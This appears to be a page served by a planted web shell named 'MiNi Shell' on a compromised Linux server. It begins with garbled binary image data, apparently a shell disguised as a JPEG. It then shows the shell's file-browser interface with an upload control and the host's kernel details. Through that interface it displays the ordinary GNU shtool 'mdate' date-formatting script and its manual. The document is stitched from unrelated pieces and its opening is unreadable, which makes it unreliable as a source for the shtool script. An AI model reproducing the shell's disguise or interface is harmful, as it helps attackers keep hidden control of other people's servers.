JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /usr/share/shtool/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //usr/share/shtool/sh.mdate

##
##  mdate -- Pretty-print modification time of a file or dir
##  Copyright (c) 1995-1997 Free Software Foundation, Inc.
##  Copyright (c) 1998-2008 Ralf S. Engelschall <rse@engelschall.com>
##
##  This file is part of shtool and free software; you can redistribute
##  it and/or modify it under the terms of the GNU General Public
##  License as published by the Free Software Foundation; either version
##  2 of the License, or (at your option) any later version.
##
##  This file is distributed in the hope that it will be useful,
##  but WITHOUT ANY WARRANTY; without even the implied warranty of
##  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
##  General Public License for more details.
##
##  You should have received a copy of the GNU General Public License
##  along with this program; if not, write to the Free Software
##  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307,
##  USA, or contact Ralf S. Engelschall <rse@engelschall.com>.
##

str_tool="mdate"
str_usage="[-n|--newline] [-z|--zero] [-s|--shorten] [-d|--digits] [-f|--field-sep <str>] [-o|--order <spec>] <path>"
arg_spec="1="
opt_spec="n.z.s.d.f:o:"
opt_alias="n:newline,z:zero,s:shorten,d:digits,f:field-sep,o:order"
opt_n=no
opt_z=no
opt_s=no
opt_d=no
opt_f=" "
opt_o="dmy"

. ./sh.common

fod="$1"
case "$opt_o" in
    [dmy][dmy][dmy] )
        ;;
    * ) echo "$msgprefix:Error: invalid argument to option \`-o': $opt_o" 1>&2
        shtool_exit 1
        ;;
esac
if [ ! -r "$fod" ]; then
    echo "$msgprefix:Error: file or directory not found: $fod" 1>&2
    shtool_exit 1
fi

#   GNU ls changes its time format in response to the TIME_STYLE
#   variable. Since we cannot assume "unset" works, revert this
#   variable to its documented default.
if [ ".$TIME_STYLE" != . ]; then
    TIME_STYLE=posix-long-iso
    export TIME_STYLE
fi

#   get the extended ls output of the file or directory.
if /bin/ls -L /dev/null >/dev/null 2>&1; then
    set - x`/bin/ls -L -l -d $fod`
else
    set - x`/bin/ls -l -d $fod`
fi

#   The month is at least the fourth argument
#   (3 shifts here, the next inside the loop).
shift; shift; shift

#   Find the month. Next argument is day, followed by the year or time.
month=""
while [ ".$month" = . ]; do
    shift
    case $1 in
        Jan) month=January;   nummonth=1  ;;
        Feb) month=February;  nummonth=2  ;;
        Mar) month=March;     nummonth=3  ;;
        Apr) month=April;     nummonth=4  ;;
        May) month=May;       nummonth=5  ;;
        Jun) month=June;      nummonth=6  ;;
        Jul) month=July;      nummonth=7  ;;
        Aug) month=August;    nummonth=8  ;;
        Sep) month=September; nummonth=9  ;;
        Oct) month=October;   nummonth=10 ;;
        Nov) month=November;  nummonth=11 ;;
        Dec) month=December;  nummonth=12 ;;
    esac
done
day="$2"
year="$3"

#   We finally have to deal with the problem that the "ls" output
#   gives either the time of the day or the year.
case $year in
    *:*)
        this_year=`date '+%Y' 2>/dev/null`
        if [ ".$this_year" = . ]; then
            this_year=`date '+%y'`
            case $this_year in
                [5-9][0-9]) this_year="19$this_year" ;;
                [0-4][0-9]) this_year="20$this_year" ;;
            esac
        fi
        #   for the following months of the last year the time notation
        #   is usually also used for files modified in the last year.
        this_month=`date '+%m'`
        if (expr $nummonth \> $this_month) >/dev/null; then
            this_year=`expr $this_year - 1`
        fi
        year="$this_year"
        ;;
esac

#   Optionally fill day and month with leeding zeros
if [ ".$opt_z" = .yes ]; then
    case $day in
        [0-9][0-9] ) ;;
             [0-9] ) day="0$day" ;;
    esac
    case $nummonth in
        [0-9][0-9] ) ;;
             [0-9] ) nummonth="0$nummonth" ;;
    esac
fi

#   Optionally use digits for month
if [ ".$opt_d" = .yes ]; then
    month="$nummonth"
fi

#   Optionally shorten the month name to three characters
if [ ".$opt_s" = .yes ]; then
    month=`echo $month | cut -c1-3`
fi

#   Output the resulting date string
echo dummy | awk '{
    for (i = 0; i < 3; i++) {
        now = substr(order, 1, 1);
        order = substr(order, 2);
        if (now == "d")
            out = day;
        else if (now == "m")
            out = month;
        else if (now == "y")
            out = year;
        if (i < 2)
            printf("%s%s", out, field);
        else
            printf("%s", out);
    }
    if (newline != "yes")
        printf("\n");
}' "day=$day" "month=$month" "year=$year" \
   "field=$opt_f" "order=$opt_o" "newline=$opt_n"

shtool_exit 0

##
##  manual page
##

=pod

=head1 NAME

B<shtool-mdate> - B<GNU shtool> pretty-print last modification time

=head1 SYNOPSIS

B<shtool mdate>
[B<-n>|B<--newline>]
[B<-z>|B<--zero>]
[B<-s>|B<--shorten>]
[B<-d>|B<--digits>]
[B<-f>|B<--field-sep> I<str>]
[B<-o>|B<--order> I<spec>]
I<path>

=head1 DESCRIPTION

This command pretty-prints the last modification time of a given file or
directory I<path>, while still allowing one to specify the format of the
date to display.

=head1 OPTIONS

The following command line options are available.

=over 4

=item B<-n>, B<--newline>

By default, output is written to F<stdout> followed by a "newline"
(ASCII character 0x0a). If option B<-n> is used, this newline character
is omitted.

=item B<-z>, B<--zero>

Pads numeric day and numeric month with a leading zero. Default is to
have variable width.

=item B<-s>, B<--shorten>

Shortens the name of the month to a english three character
abbreviation. Default is full english name. This option is silently
ignored when combined with B<-d>.

=item B<-d>, B<--digits>

Use digits for month. Default is to use a english name.

=item B<-f>, B<--field-sep> I<str>

Field separator string between the day month year tripple. Default is a
single space character.

=item B<-o>, B<--order> I<spec>

Specifies order of the day month year elements within the tripple. Each
element represented as a single character out of ``C<d>'', ``C<m>'' and
``C<y>''. The default for I<spec> is ``C<dmy>''.


=back

=head1 EXAMPLE

 #   shell script
 shtool mdate -n /
 shtool mdate -f '/' -z -d -o ymd foo.txt
 shtool mdate -f '-' -s foo.txt

=head1 HISTORY

The B<GNU shtool> B<mdate> command was originally written by
Ulrich Drepper in 1995 and revised by Ralf S. Engelschall
E<lt>rse@engelschall.comE<gt> in 1998 for inclusion into B<GNU shtool>.

=head1 SEE ALSO

shtool(1), date(1), ls(1).

=cut


Creat By MiNi SheLL
Email: jattceo@gmail.com